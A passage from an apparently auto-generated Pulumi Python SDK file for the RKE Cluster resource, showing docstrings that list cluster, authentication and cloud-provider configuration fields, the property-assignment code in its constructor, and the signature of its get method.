* `calicoControllers` (`pulumi.Input[str]`) - Docker image for calico_controllers (string)
* `calicoCtl` (`pulumi.Input[str]`) - Docker image for calico_ctl (string)
* `calicoFlexVol` (`pulumi.Input[str]`) - Docker image for calico_flex_vol (string)
* `calicoNode` (`pulumi.Input[str]`) - Docker image for calico_node (string)
* `canalCni` (`pulumi.Input[str]`) - Docker image for canal_cni (string)
* `canalFlannel` (`pulumi.Input[str]`) - Docker image for canal_flannel (string)
* `canalFlexVol` (`pulumi.Input[str]`) - Docker image for canal_flex_vol (string)
* `canalNode` (`pulumi.Input[str]`) - Docker image for canal_node (string)
* `certDownloader` (`pulumi.Input[str]`) - Docker image for cert_downloader (string)
* `coredns` (`pulumi.Input[str]`) - Docker image for coredns (string)
* `corednsAutoscaler` (`pulumi.Input[str]`) - Docker image for coredns_autoscaler (string)
* `dnsmasq` (`pulumi.Input[str]`) - Docker image for dnsmasq (string)
* `etcd` (`pulumi.Input[str]`) - Docker image for etcd (string)
* `flannel` (`pulumi.Input[str]`) - Docker image for flannel (string)
* `flannelCni` (`pulumi.Input[str]`) - Docker image for flannel_cni (string)
* `ingress` (`pulumi.Input[str]`) - Docker image for ingress (string)
* `ingressBackend` (`pulumi.Input[str]`) - Docker image for ingress_backend (string)
* `kubeDns` (`pulumi.Input[str]`) - Docker image for kube_dns (string)
* `kubeDnsAutoscaler` (`pulumi.Input[str]`) - Docker image for kube_dns_autoscaler (string)
* `kubeDnsSidecar` (`pulumi.Input[str]`) - Docker image for kube_dns_sidecar (string)
* `kubernetes` (`pulumi.Input[str]`) - Docker image for kubernetes (string)
* `kubernetesServicesSidecar` (`pulumi.Input[str]`) - Docker image for kubernetes_services_sidecar (string)
* `metricsServer` (`pulumi.Input[str]`) - Docker image for metrics_server (string)
* `nginxProxy` (`pulumi.Input[str]`) - Docker image for nginx_proxy (string)
* `nodelocal` (`pulumi.Input[str]`) - Docker image for nodelocal (string)
* `podInfraContainer` (`pulumi.Input[str]`) - Docker image for pod_infra_container (string)
* `weaveCni` (`pulumi.Input[str]`) - Docker image for weave_cni (string)
* `weaveNode` (`pulumi.Input[str]`) - Docker image for weave_node (string)
* `windowsPodInfraContainer` (`pulumi.Input[str]`) - Docker image for windows_pod_infra_container (string)
The **upgrade_strategy** object supports the following:
* `drain` (`pulumi.Input[bool]`) - RKE drain nodes. Default: `false` (bool)
* `drainInput` (`pulumi.Input[dict]`) - RKE drain node input (list Maxitems: 1)
* `deleteLocalData` (`pulumi.Input[bool]`) - Delete RKE node local data. Default: `false` (bool)
* `force` (`pulumi.Input[bool]`) - Force RKE node drain. Default: `false` (bool)
* `gracePeriod` (`pulumi.Input[float]`) - RKE node drain grace period. Default: `-1` (int)
* `ignoreDaemonSets` (`pulumi.Input[bool]`) - Ignore RKE daemon sets. Default: `true` (bool)
* `timeout` (`pulumi.Input[float]`) - RKE node drain timeout. Default: `60` (int)
* `maxUnavailableControlplane` (`pulumi.Input[str]`) - RKE max unavailable controlplane nodes. Default: `1` (string)
* `maxUnavailableWorker` (`pulumi.Input[str]`) - RKE max unavailable worker nodes. Default: `10%` (string)
"""
if __name__ is not None:
warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning)
resource_name = __name__
if __opts__ is not None:
warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning)
opts = __opts__
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = dict()
__props__['addon_job_timeout'] = addon_job_timeout
__props__['addons'] = addons
__props__['addons_includes'] = addons_includes
__props__['authentication'] = authentication
__props__['authorization'] = authorization
__props__['bastion_host'] = bastion_host
__props__['cert_dir'] = cert_dir
__props__['cloud_provider'] = cloud_provider
__props__['cluster_name'] = cluster_name
__props__['cluster_yaml'] = cluster_yaml
__props__['custom_certs'] = custom_certs
__props__['delay_on_creation'] = delay_on_creation
__props__['dind'] = dind
__props__['dind_dns_server'] = dind_dns_server
__props__['dind_storage_driver'] = dind_storage_driver
__props__['disable_port_check'] = disable_port_check
__props__['dns'] = dns
__props__['ignore_docker_version'] = ignore_docker_version
__props__['ingress'] = ingress
__props__['kubernetes_version'] = kubernetes_version
__props__['monitoring'] = monitoring
__props__['network'] = network
__props__['nodes'] = nodes
__props__['nodes_confs'] = nodes_confs
__props__['prefix_path'] = prefix_path
__props__['private_registries'] = private_registries
__props__['restore'] = restore
__props__['rotate_certificates'] = rotate_certificates
__props__['services'] = services
__props__['services_etcd_deprecated'] = services_etcd_deprecated
__props__['services_kube_api_deprecated'] = services_kube_api_deprecated
__props__['services_kube_controller_deprecated'] = services_kube_controller_deprecated
__props__['services_kube_proxy_deprecated'] = services_kube_proxy_deprecated
__props__['services_kube_scheduler_deprecated'] = services_kube_scheduler_deprecated
__props__['services_kubelet_deprecated'] = services_kubelet_deprecated
__props__['ssh_agent_auth'] = ssh_agent_auth
__props__['ssh_cert_path'] = ssh_cert_path
__props__['ssh_key_path'] = ssh_key_path
__props__['system_images'] = system_images
__props__['update_only'] = update_only
__props__['upgrade_strategy'] = upgrade_strategy
__props__['api_server_url'] = None
__props__['ca_crt'] = None
__props__['certificates'] = None
__props__['client_cert'] = None
__props__['client_key'] = None
__props__['cluster_cidr'] = None
__props__['cluster_dns_server'] = None
__props__['cluster_domain'] = None
__props__['control_plane_hosts'] = None
__props__['etcd_hosts'] = None
__props__['inactive_hosts'] = None
__props__['internal_kube_config_yaml'] = None
__props__['kube_admin_user'] = None
__props__['kube_config_yaml'] = None
__props__['rke_cluster_yaml'] = None
__props__['rke_state'] = None
__props__['running_system_images'] = None
__props__['worker_hosts'] = None
super(Cluster, __self__).__init__(
'rke:index/cluster:Cluster',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name, id, opts=None, addon_job_timeout=None, addons=None, addons_includes=None, api_server_url=None, authentication=None, authorization=None, bastion_host=None, ca_crt=None, cert_dir=None, certificates=None, client_cert=None, client_key=None, cloud_provider=None, cluster_cidr=None, cluster_dns_server=None, cluster_domain=None, cluster_name=None, cluster_yaml=None, control_plane_hosts=None, custom_certs=None, delay_on_creation=None, dind=None, dind_dns_server=None, dind_storage_driver=None, disable_port_check=None, dns=None, etcd_hosts=None, ignore_docker_version=None, inactive_hosts=None, ingress=None, internal_kube_config_yaml=None, kube_admin_user=None, kube_config_yaml=None, kubernetes_version=None, monitoring=None, network=None, nodes=None, nodes_confs=None, prefix_path=None, private_registries=None, restore=None, rke_cluster_yaml=None, rke_state=None, rotate_certificates=None, running_system_images=None, services=None, services_etcd_deprecated=None, services_kube_api_deprecated=None, services_kube_controller_deprecated=None, services_kube_proxy_deprecated=None, services_kube_scheduler_deprecated=None, services_kubelet_deprecated=None, ssh_agent_auth=None, ssh_cert_path=None, ssh_key_path=None, system_images=None, update_only=None, upgrade_strategy=None, worker_hosts=None):
"""
Get an existing Cluster resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param str id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[float] addon_job_timeout: RKE k8s cluster addon deployment timeout in seconds for status check (int)
:param pulumi.Input[str] addons: RKE k8s cluster user addons YAML manifest to be deployed (string)
:param pulumi.Input[list] addons_includes: RKE k8s cluster user addons YAML manifest urls or paths to be deployed (list)
:param pulumi.Input[str] api_server_url: (Computed) RKE k8s cluster api server url (string)
:param pulumi.Input[dict] authentication: RKE k8s cluster authentication configuration (list maxitems:1)
:param pulumi.Input[dict] authorization: RKE k8s cluster authorization mode configuration (list maxitems:1)
:param pulumi.Input[dict] bastion_host: RKE k8s cluster bastion Host configuration (list maxitems:1)
:param pulumi.Input[str] ca_crt: (Computed/Sensitive) RKE k8s cluster CA certificate (string)
:param pulumi.Input[str] cert_dir: Specify a certificate dir path (string)
:param pulumi.Input[list] certificates: (Computed/Sensitive) RKE k8s cluster certificates (string)
:param pulumi.Input[str] client_cert: (Computed/Sensitive) RKE k8s cluster client certificate (string)
:param pulumi.Input[str] client_key: (Computed/Sensitive) RKE k8s cluster client key (string)
:param pulumi.Input[dict] cloud_provider: Calico cloud provider (string)
:param pulumi.Input[str] cluster_cidr: Cluster CIDR option for kube controller service (string)
:param pulumi.Input[str] cluster_dns_server: Cluster DNS Server option for kubelet service (string)
:param pulumi.Input[str] cluster_domain: Cluster Domain option for kubelet service. Default `cluster.local` (string)
:param pulumi.Input[str] cluster_name: RKE k8s cluster name used in the kube config (string)
:param pulumi.Input[str] cluster_yaml: RKE k8s cluster config yaml encoded. Provider arguments take precedence over this one (string)
:param pulumi.Input[list] control_plane_hosts: (Computed) RKE k8s cluster control plane nodes (list)
:param pulumi.Input[bool] custom_certs: Use custom certificates from a cert dir (string)
:param pulumi.Input[float] delay_on_creation: RKE k8s cluster delay on creation (int)
:param pulumi.Input[bool] dind: Deploy RKE cluster on a dind environment. Default: `false` (bool)
:param pulumi.Input[str] dind_dns_server: DinD RKE cluster dns (string)
:param pulumi.Input[str] dind_storage_driver: DinD RKE cluster storage driver (string)
:param pulumi.Input[bool] disable_port_check: Enable/Disable RKE k8s cluster port checking. Default `false` (bool)
:param pulumi.Input[dict] dns: RKE k8s cluster DNS Config (list maxitems:1)
:param pulumi.Input[list] etcd_hosts: (Computed) RKE k8s cluster etcd nodes (list)
:param pulumi.Input[bool] ignore_docker_version: Enable/Disable RKE k8s cluster strict docker version checking. Default `false` (bool)
:param pulumi.Input[list] inactive_hosts: (Computed) RKE k8s cluster inactive nodes (list)
:param pulumi.Input[dict] ingress: Docker image for ingress (string)
:param pulumi.Input[str] internal_kube_config_yaml: (Computed/Sensitive) RKE k8s cluster internal kube config yaml (string)
:param pulumi.Input[str] kube_admin_user: (Computed) RKE k8s cluster admin user (string)
:param pulumi.Input[str] kube_config_yaml: (Computed/Sensitive) RKE k8s cluster kube config yaml (string)
:param pulumi.Input[str] kubernetes_version: K8s version to deploy. If kubernetes image is specified, image version takes precedence. Default: `rke default` (string)
:param pulumi.Input[dict] monitoring: RKE k8s cluster monitoring Config (list maxitems:1)
:param pulumi.Input[dict] network: (list maxitems:1)
:param pulumi.Input[list] nodes: RKE k8s cluster nodes (list)
:param pulumi.Input[str] prefix_path: RKE k8s directory path (string)
:param pulumi.Input[list] private_registries: RKE k8s cluster private docker registries (list)
:param pulumi.Input[dict] restore: Restore cluster. Default `false` (bool)
:param pulumi.Input[str] rke_cluster_yaml: (Computed/Sensitive) RKE k8s cluster config yaml (string)
:param pulumi.Input[str] rke_state: (Computed/Sensitive) RKE k8s cluster state (string)
:param pulumi.Input[dict] rotate_certificates: RKE k8s cluster rotate certificates configuration (list maxitems:1)
:param pulumi.Input[dict] running_system_images: (Computed) RKE k8s cluster running system images list (list)
:param pulumi.Input[dict] services: Services to rotate their certs. `etcd`, `kubelet`, `kube-apiserver`, `kube-proxy`, `kube-scheduler` and `kube-controller-manager` are supported (list)
:param pulumi.Input[dict] services_etcd_deprecated: Use services.etcd instead (list maxitems:1)
:param pulumi.Input[dict] services_kube_api_deprecated: Use services.kube_api instead (list maxitems:1)
:param pulumi.Input[dict] services_kube_controller_deprecated: Use services.kube_controller instead (list maxitems:1)
:param pulumi.Input[dict] services_kube_proxy_deprecated: Use services.kubeproxy instead (list maxitems:1)
:param pulumi.Input[dict] services_kube_scheduler_deprecated: Use services.scheduler instead (list maxitems:1)
:param pulumi.Input[dict] services_kubelet_deprecated: Use services.kubelet instead (list maxitems:1)
:param pulumi.Input[bool] ssh_agent_auth: SSH Agent Auth enable (bool)
:param pulumi.Input[str] ssh_cert_path: SSH Certificate path (string)
:param pulumi.Input[str] ssh_key_path: SSH Private Key path (string)
:param pulumi.Input[dict] system_images: RKE k8s cluster system images list (list maxitems:1)
:param pulumi.Input[bool] update_only: Skip idempotent deployment of control and etcd plane. Default `false` (bool)
:param pulumi.Input[dict] upgrade_strategy: RKE k8s cluster upgrade strategy (list maxitems:1)
:param pulumi.Input[list] worker_hosts: (Computed) RKE k8s cluster worker nodes (list)
The **authentication** object supports the following:
* `sans` (`pulumi.Input[list]`) - List of additional hostnames and IPs to include in the api server PKI cert (list)
* `strategy` (`pulumi.Input[str]`) - Authentication strategy that will be used in RKE k8s cluster. Default: `x509` (string)
* `webhook` (`pulumi.Input[dict]`) - Webhook configuration options (list maxitem: 1)
* `cacheTimeout` (`pulumi.Input[str]`) - Controls how long to cache authentication decisions (string)
* `configFile` (`pulumi.Input[str]`) - Multiline string that represent a custom webhook config file (string)
The **authorization** object supports the following:
* `mode` (`pulumi.Input[str]`) - RKE mode for authorization. `rbac` and `none` modes are available. Default `rbac` (string)
* `options` (`pulumi.Input[dict]`) - Network provider options (map)
The **bastion_host** object supports the following:
* `address` (`pulumi.Input[str]`) - Address ip for node (string)
* `port` (`pulumi.Input[str]`) - Port used for SSH communication. Default `22` (string)
* `ssh_agent_auth` (`pulumi.Input[bool]`) - SSH Agent Auth enable (bool)
* `sshCert` (`pulumi.Input[str]`) - SSH Certificate (string)
* `ssh_cert_path` (`pulumi.Input[str]`) - SSH Certificate path (string)
* `sshKey` (`pulumi.Input[str]`) - SSH Private Key (string)
* `ssh_key_path` (`pulumi.Input[str]`) - SSH Private Key path (string)
* `user` (`pulumi.Input[str]`) - Registry user (string)
The **certificates** object supports the following:
* `certificate` (`pulumi.Input[str]`)
* `commonName` (`pulumi.Input[str]`)
* `config` (`pulumi.Input[str]`)
* `configEnvName` (`pulumi.Input[str]`)
* `configPath` (`pulumi.Input[str]`)
* `envName` (`pulumi.Input[str]`)
* `id` (`pulumi.Input[str]`) - (Computed) The ID of the resource (string)
* `key` (`pulumi.Input[str]`) - TLS key for etcd service (string)
* `keyEnvName` (`pulumi.Input[str]`)
* `keyPath` (`pulumi.Input[str]`)
* `name` (`pulumi.Input[str]`) - Name of virtualcenter config for Vsphere Cloud Provider config (string)
* `ouName` (`pulumi.Input[str]`)
* `path` (`pulumi.Input[str]`) - Audit log path. Default: `/var/log/kube-audit/audit-log.json` (string)
The **cloud_provider** object supports the following:
* `awsCloudConfig` (`pulumi.Input[dict]`) - Use aws_cloud_provider instead
* `global` (`pulumi.Input[dict]`) - (list maxitems:1)
* `disableSecurityGroupIngress` (`pulumi.Input[bool]`) - Disables the automatic ingress creation. Default `false` (bool)
* `disableStrictZoneCheck` (`pulumi.Input[bool]`) - Setting this to true will disable the check and provide a warning that the check was skipped. Default `false` (bool)
* `elbSecurityGroup` (`pulumi.Input[str]`) - Use these ELB security groups instead create new (string)
* `kubernetesClusterId` (`pulumi.Input[str]`) - The cluster id we'll use to identify our cluster resources (string)
* `kubernetesClusterTag` (`pulumi.Input[str]`) - Legacy cluster id we'll use to identify our cluster resources (string)
* `roleArn` (`pulumi.Input[str]`) - IAM role to assume when interaction with AWS APIs (string)
* `routeTableId` (`pulumi.Input[str]`) - Enables using a specific RouteTable (string)
* `subnetId` (`pulumi.Input[str]`) - (string)
* `vpc` (`pulumi.Input[str]`) - The AWS VPC flag enables the possibility to run the master components on a different aws account, on a different cloud provider or on-premises. If the flag is set also the KubernetesClusterTag must be provided (string)
* `zone` (`pulumi.Input[str]`) - The AWS zone (string)
* `serviceOverrides` (`pulumi.Input[list]`) - (list)
* `key` (`pulumi.Input[str]`) - TLS key for etcd service (string)
* `region` (`pulumi.Input[str]`) - Region for S3 service (string)
* `service` (`pulumi.Input[str]`) - (string)
* `signingMethod` (`pulumi.Input[str]`) - (string)
* `signingName` (`pulumi.Input[str]`) - (string)
* `signingRegion` (`pulumi.Input[str]`) - (string)
* `url` (`pulumi.Input[str]`) - Registry URL (string)
* `awsCloudProvider` (`pulumi.Input[dict]`) - AWS Cloud Provider config [rke-aws-cloud-provider](https://rancher.com/docs/rke/latest/en/config-options/cloud-providers/aws/) (list maxitems:1)
* `global` (`pulumi.Input[dict]`) - (list maxitems:1)
* `disableSecurityGroupIngress` (`pulumi.Input[bool]`) - Disables the automatic ingress creation. Default `false` (bool)
* `disableStrictZoneCheck` (`pulumi.Input[bool]`) - Setting this to true will disable the check and provide a warning that the check was skipped. Default `false` (bool)
* `elbSecurityGroup` (`pulumi.Input[str]`) - Use these ELB security groups instead create new (string)
* `kubernetesClusterId` (`pulumi.Input[str]`) - The cluster id we'll use to identify our cluster resources (string)
* `kubernetesClusterTag` (`pulumi.Input[str]`) - Legacy cluster id we'll use to identify our cluster resources (string)
* `roleArn` (`pulumi.Input[str]`) - IAM role to assume when interaction with AWS APIs (string)
* `routeTableId` (`pulumi.Input[str]`) - Enables using a specific RouteTable (string)
* `subnetId` (`pulumi.Input[str]`) - (string)
* `vpc` (`pulumi.Input[str]`) - The AWS VPC flag enables the possibility to run the master components on a different aws account, on a different cloud provider or on-premises. If the flag is set also the KubernetesClusterTag must be provided (string)
* `zone` (`pulumi.Input[str]`) - The AWS zone (string)
* `serviceOverrides` (`pulumi.Input[list]`) - (list)
* `key` (`pulumi.Input[str]`) - TLS key for etcd service (string)
* `region` (`pulumi.Input[str]`) - Region for S3 service (string)
* `service` (`pulumi.Input[str]`) - (string)
* `signingMethod` (`pulumi.Input[str]`) - (string)
* `signingName` (`pulumi.Input[str]`) - (string)
* `signingRegion` (`pulumi.Input[str]`) - (string)
* `url` (`pulumi.Input[str]`) - Registry URL (string)
* `azureCloudConfig` (`pulumi.Input[dict]`) - Use azure_cloud_provider instead
* `aadClientCertPassword` (`pulumi.Input[str]`) - (string)
* `aadClientCertPath` (`pulumi.Input[str]`) - (string)
* `aadClientId` (`pulumi.Input[str]`) - (string)
* `aadClientSecret` (`pulumi.Input[str]`) - (string)
* `cloud` (`pulumi.Input[str]`) - (string)
* `cloudProviderBackoff` (`pulumi.Input[bool]`) - (bool)
* `cloudProviderBackoffDuration` (`pulumi.Input[float]`) - (int)
* `cloudProviderBackoffExponent` (`pulumi.Input[float]`) - (int)
* `cloudProviderBackoffJitter` (`pulumi.Input[float]`) - (int)
* `cloudProviderBackoffRetries` (`pulumi.Input[float]`) - (int)
* `cloudProviderRateLimit` (`pulumi.Input[bool]`) - (bool)
* `cloudProviderRateLimitBucket` (`pulumi.Input[float]`) - (int)
* `cloudProviderRateLimitQps` (`pulumi.Input[float]`) - (int)
* `loadBalancerSku` (`pulumi.Input[str]`)
* `location` (`pulumi.Input[str]`) - (string)
* `maximumLoadBalancerRuleCount` (`pulumi.Input[float]`) - (int)
* `primaryAvailabilitySetName` (`pulumi.Input[str]`) - (string)
* `primaryScaleSetName` (`pulumi.Input[str]`) - (string)
* `resourceGroup` (`pulumi.Input[str]`) - (string)
* `routeTableName` (`pulumi.Input[str]`) - (string)
* `securityGroupName` (`pulumi.Input[str]`) - (string)
* `subnetName` (`pulumi.Input[str]`) - (string)
* `subscriptionId` (`pulumi.Input[str]`) - (string)
* `tenantId` (`pulumi.Input[str]`) - Required if `tenant_name` not provided. (string)
* `useInstanceMetadata` (`pulumi.Input[bool]`) - (bool)
* `useManagedIdentityExtension` (`pulumi.Input[bool]`) - (bool)
* `vmType` (`pulumi.Input[str]`) - (string)
* `vnetName` (`pulumi.Input[str]`) - (string)
* `vnetResourceGroup` (`pulumi.Input[str]`) - (string)
* `azureCloudProvider` (`pulumi.Input[dict]`) - Azure Cloud Provider config [rke-azure-cloud-provider](https://rancher.com/docs/rke/latest/en/config-options/cloud-providers/azure/) (list maxitems:1)
* `aadClientCertPassword` (`pulumi.Input[str]`) - (string)
* `aadClientCertPath` (`pulumi.Input[str]`) - (string)
* `aadClientId` (`pulumi.Input[str]`) - (string)
* `aadClientSecret` (`pulumi.Input[str]`) - (string)
* `cloud` (`pulumi.Input[str]`) - (string)
* `cloudProviderBackoff` (`pulumi.Input[bool]`) - (bool)
* `cloudProviderBackoffDuration` (`pulumi.Input[float]`) - (int)
* `cloudProviderBackoffExponent` (`pulumi.Input[float]`) - (int)
* `cloudProviderBackoffJitter` (`pulumi.Input[float]`) - (int)
* `cloudProviderBackoffRetries` (`pulumi.Input[float]`) - (int)
* `cloudProviderRateLimit` (`pulumi.Input[bool]`) - (bool)
* `cloudProviderRateLimitBucket` (`pulumi.Input[float]`) - (int)
* `cloudProviderRateLimitQps` (`pulumi.Input[float]`) - (int)
* `loadBalancerSku` (`pulumi.Input[str]`)
* `location` (`pulumi.Input[str]`) - (string)
* `maximumLoadBalancerRuleCount` (`pulumi.Input[float]`) - (int)
* `primaryAvailabilitySetName` (`pulumi.Input[str]`) - (string)
* `primaryScaleSetName` (`pulumi.Input[str]`) - (string)
* `resourceGroup` (`pulumi.Input[str]`) - (string)
* `routeTableName` (`pulumi.Input[str]`) - (string)
* `securityGroupName` (`pulumi.Input[str]`) - (string)
* `subnetName` (`pulumi.Input[str]`) - (string)
* `subscriptionId` (`pulumi.Input[str]`) - (string)
* `tenantId` (`pulumi.Input[str]`) - Required if `tenant_name` not provided. (string)
* `useInstanceMetadata` (`pulumi.Input[bool]`) - (bool)
* `useManagedIdentityExtension` (`pulumi.Input[bool]`) - (bool)
* `vmType` (`pulumi.Input[str]`) - (string)
* `vnetName` (`pulumi.Input[str]`) - (string)
* `vnetResourceGroup` (`pulumi.Input[str]`) - (string)
* `customCloudConfig` (`pulumi.Input[str]`) - Use custom_cloud_provider instead
* `customCloudProvider` (`pulumi.Input[str]`) - Custom Cloud Provider config (string)
* `name` (`pulumi.Input[str]`) - Name of virtualcenter config for Vsphere Cloud Provider config (string)
* `openstackCloudConfig` (`pulumi.Input[dict]`) - Use openstack_cloud_provider instead
* `blockStorage` (`pulumi.Input[dict]`) - (list maxitems:1)
* `bsVersion` (`pulumi.Input[str]`) - (string)
* `ignoreVolumeAz` (`pulumi.Input[bool]`) - (string)
* `trustDevicePath` (`pulumi.Input[bool]`) - (string)
* `global` (`pulumi.Input[dict]`) - (list maxitems:1)
* `authUrl` (`pulumi.Input[str]`) - (string)
* `caFile` (`pulumi.Input[str]`) - (string)
* `domainId` (`pulumi.Input[str]`) - Required if `domain_name` not provided. (string)
* `domainName` (`pulumi.Input[str]`) - Required if `domain_id` not provided. (string)
* `password` (`pulumi.Input[str]`) - Registry password (string)
* `region` (`pulumi.Input[str]`) - Region for S3 service (string)
* `tenantId` (`pulumi.Input[str]`) - Required if `tenant_name` not provided. (string)
* `tenantName` (`pulumi.Input[str]`) - Required if `tenant_id` not provided. (string)
* `trustId` (`pulumi.Input[str]`) - (string)
* `userId` (`pulumi.Input[str]`) - Required if `username` not provided. (string)
* `username` (`pulumi.Input[str]`) - Required if `user_id` not provided. (string)
* `loadBalancer` (`pulumi.Input[dict]`) - (list maxitems:1)
* `createMonitor` (`pulumi.Input[bool]`) - (bool)
* `floatingNetworkId` (`pulumi.Input[str]`) - (string)
* `lbMethod` (`pulumi.Input[str]`) - (string)
* `lbProvider` (`pulumi.Input[str]`) - (string)
* `lbVersion` (`pulumi.Input[str]`) - (string)
* `manageSecurityGroups` (`pulumi.Input[bool]`) - (bool)
* `monitorDelay` (`pulumi.Input[str]`) - Default `60s` (string)
* `monitorMaxRetries` (`pulumi.Input[float]`) - Default 5 (int)
* `monitorTimeout` (`pulumi.Input[str]`) - Default `30s` (string)
* `subnetId` (`pulumi.Input[str]`) - (string)
* `useOctavia` (`pulumi.Input[bool]`) - (bool)
* `metadata` (`pulumi.Input[dict]`) - (list maxitems:1)
* `requestTimeout` (`pulumi.Input[float]`) - (int)
* `searchOrder` (`pulumi.Input[str]`) - (string)
* `route` (`pulumi.Input[dict]`) - (list maxitems:1)
* `routerId` (`pulumi.Input[str]`) - (string)
* `openstackCloudProvider` (`pulumi.Input[dict]`) - Openstack Cloud Provider config [rke-openstack-cloud-provider](https://rancher.com/docs/rke/latest/en/config-options/cloud-providers/openstack/) (list maxitems:1)
* `blockStorage` (`pulumi.Input[dict]`) - (list maxitems:1)
* `bsVersion` (`pulumi.Input[str]`) - (string)
* `ignoreVolumeAz` (`pulumi.Input[bool]`) - (string)
* `trustDevicePath` (`pulumi.Input[bool]`) - (string)
* `global` (`pulumi.Input[dict]`) - (list maxitems:1)
* `authUrl` (`pulumi.Input[str]`) - (string)
* `caFile` (`pulumi.Input[str]`) - (string)
* `domainId` (`pulumi.Input[str]`) - Required if `domain_name` not provided. (string)
* `domainName` (`pulumi.Input[str]`) - Required if `domain_id` not provided. (string)
* `password` (`pulumi.Input[str]`) - Registry password (string)
* `region` (`pulumi.Input[str]`) - Region for S3 service (string)
* `tenantId` (`pulumi.Input[str]`) - Required if `tenant_name` not provided. (string)
* `tenantName` (`pulumi.Input[str]`) - Required if `tenant_id` not provided. (string)
* `trustId` (`pulumi.Input[str]`) - (string)
* `userId` (`pulumi.Input[str]`) - Required if `username` not provided. (string)
* `username` (`pulumi.Input[str]`) - Required if `user_id` not provided. (string)
* `loadBalancer` (`pulumi.Input[dict]`) - (list maxitems:1)
* `createMonitor` (`pulumi.Input[bool]`) - (bool)
* `floatingNetworkId` (`pulumi.Input[str]`) - (string)
* `lbMethod` (`pulumi.Input[str]`) - (string)
* `lbProvider` (`pulumi.Input[str]`) - (string)
* `lbVersion` (`pulumi.Input[str]`) - (string)
* `manageSecurityGroups` (`pulumi.Input[bool]`) - (bool)
* `monitorDelay` (`pulumi.Input[str]`) - Default `60s` (string)
* `monitorMaxRetries` (`pulumi.Input[float]`) - Default 5 (int)
* `monitorTimeout` (`pulumi.Input[str]`) - Default `30s` (string)
* `subnetId` (`pulumi.Input[str]`) - (string)
* `useOctavia` (`pulumi.Input[bool]`) - (bool)
* `metadata` (`pulumi.Input[dict]`) - (list maxitems:1)
* `requestTimeout` (`pulumi.Input[float]`) - (int)
* `searchOrder` (`pulumi.Input[str]`) - (string)
* `route` (`pulumi.Input[dict]`) - (list maxitems:1)
* `routerId` (`pulumi.Input[str]`) - (string)
* `vsphereCloudConfig` (`pulumi.Input[dict]`) - Use vsphere_cloud_provider instead
* `disk` (`pulumi.Input[dict]`) - (list maxitems:1)
* `scsiControllerType` (`pulumi.Input[str]`) - (string)
* `global` (`pulumi.Input[dict]`) - (list maxitems:1)
* `datacenter` (`pulumi.Input[str]`) - (string)
* `datacenters` (`pulumi.Input[str]`) - (string)
* `datastore` (`pulumi.Input[str]`) - (string)
* `insecureFlag` (`pulumi.Input[bool]`) - (bool)
* `password` (`pulumi.Input[str]`) - Registry password (string)
* `port` (`pulumi.Input[str]`) - Port used for SSH communication. Default `22` (string)
* `soapRoundtripCount` (`pulumi.Input[float]`) - (int)
* `user` (`pulumi.Input[str]`) - Registry user (string)
* `vmName` (`pulumi.Input[str]`) - (string)
* `vmUuid` (`pulumi.Input[str]`) - (string)
* `workingDir` (`pulumi.Input[str]`) - (string)
* `network` (`pulumi.Input[dict]`) - (list maxitems:1)
* `publicNetwork` (`pulumi.Input[str]`) - (string)
* `virtualCenters` (`pulumi.Input[list]`) - (List)
* `datacenters` (`pulumi.Input[str]`) - (string)
* `name` (`pulumi.Input[str]`) - Name of virtualcenter config for Vsphere Cloud Provider config (string)
* `password` (`pulumi.Input[str]`) - Registry password (string)
* `port` (`pulumi.Input[str]`) - Port used for SSH communication. Default `22` (string)
* `soapRoundtripCount` (`pulumi.Input[float]`) - (int)
* `user` (`pulumi.Input[str]`) - Registry user (string)
* `workspace` (`pulumi.Input[dict]`) - (list maxitems:1)
* `datacenter` (`pulumi.Input[str]`) - (string)
* `defaultDatastore` (`pulumi.Input[str]`) - (string)
* `folder` (`pulumi.Input[str]`) - Folder for S3 service. Available from Rancher v2.2.7 (string)
* `resourcepoolPath` (`pulumi.Input[str]`) - (string)
* `server` (`pulumi.Input[str]`) - (string)
* `vsphereCloudProvider` (`pulumi.Input[dict]`) - Vsphere Cloud Provider config [rke-vsphere-cloud-provider](https://rancher.com/docs/rke/latest/en/config-options/cloud-providers/vsphere/) Extra argument `name` is required on `virtual_center` configuration. (list maxitems:1)
* `disk` (`pulumi.Input[dict]`) - (list maxitems:1)
* `scsiControllerType` (`pulumi.Input[str]`) - (string)
* `global` (`pulumi.Input[dict]`) - (list maxitems:1)
* `datacenter` (`pulumi.Input[str]`) - (string)
* `datacenters` (`pulumi.Input[str]`) - (string)
* `datastore` (`pulumi.Input[str]`) - (string)
* `insecureFlag` (`pulumi.Input[bool]`) - (bool)
* `password` (`pulumi.Input[str]`) - Registry password (string)
* `port` (`pulumi.Input[str]`) - Port used for SSH communication. Default `22` (string)
* `soapRoundtripCount` (`pulumi.Input[float]`) - (int)
* `user` (`pulumi.Input[str]`) - Registry user (string)
* `vmName` (`pulumi.Input[str]`) - (string)
* `vmUuid` (`pulumi.Input[str]`) - (string)
* `workingDir` (`pulumi.Input[str]`) - (string)
* `network` (`pulumi.Input[dict]`) - (list maxitems:1)
* `publicNetwork` (`pulumi.Input[str]`) - (string)
* `virtualCenters` (`pulumi.Input[list]`) - (List)
* `datacenters` (`pulumi.Input[str]`) - (string)
* `name` (`pulumi.Input[str]`) - Name of virtualcenter config for Vsphere Cloud Provider config (string)
* `password` (`pulumi.Input[str]`) - Registry password (string)
* `port` (`pulumi.Input[str]`) - Port used for SSH communication. Default `22` (string)
* `soapRoundtripCount` (`pulumi.Input[float]`) - (int)
* `user` (`pulumi.Input[str]`) - Registry user (string)
* `workspace` (`pulumi.Input[dict]`) - (list maxitems:1)
* `datacenter` (`pulumi.Input[str]`) - (string)
* `defaultDatastore` (`pulumi.Input[str]`) - (string)
* `folder` (`pulumi.Input[str]`) - Folder for S3 service. Available from Rancher v2.2.7 (string)
* `resourcepoolPath` (`pulumi.Input[str]`) - (string)
* `server` (`pulumi.Input[str]`) - (string)
The **control_plane_hosts** object supports the following:
